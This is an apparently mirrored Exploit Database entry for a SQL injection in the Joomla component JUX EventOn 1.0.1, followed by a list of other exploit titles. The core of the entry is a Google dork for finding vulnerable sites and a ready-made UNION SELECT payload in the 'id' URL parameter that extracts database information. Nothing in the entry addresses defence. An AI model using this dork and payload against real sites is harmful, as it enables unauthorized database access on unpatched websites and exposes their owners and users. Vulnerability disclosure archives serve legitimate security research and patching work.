Joomla! Component JUX EventOn 1.0.1 – ‘id’ SQL Injection

Exploit Database
17 阅读

作者： Ihsan Sencan

日期： 2017-03-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41504/

# # # # # 
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_jux_eventon
# Date: 04.03.2017
# Vendor Homepage: http://joomlaux.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
# Demo: http://demo.joomlaux.com/extensions/eventon/
# Version: 1.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
# 3+union+select+1,@@version,3,4,5,6
# # # # #

last Exploits
Joomla! Component JUX EventOn 1.0.1 – ‘id’ SQL Injection的更多信息

Tapatalk for vBulletin 4.x – Blind SQL Injection：
DirectAdmin Web Control Panel 1.483 – Multiple Vulnerabilities：
KBVault MySQL 0.16a – Arbitrary File Upload：
WordPress Plugin WP Forum Server 1.7.3 – ‘/fs-admin/fs-admin.php’ Multiple Cross-Site Scripting Vulnerabilities：
Apache OpenMeetings 5.0.0 – ‘hostname’ Denial of Service：
Phreebooks 2.0 – Multiple Persistent Cross-Site Scripting Vulnerabilities：
Zoho ManageEngine ServiceDesk Plus 9.3 – Cross-Site Scripting：
AirControl 1.4.2 – PreAuth Remote Code Execution：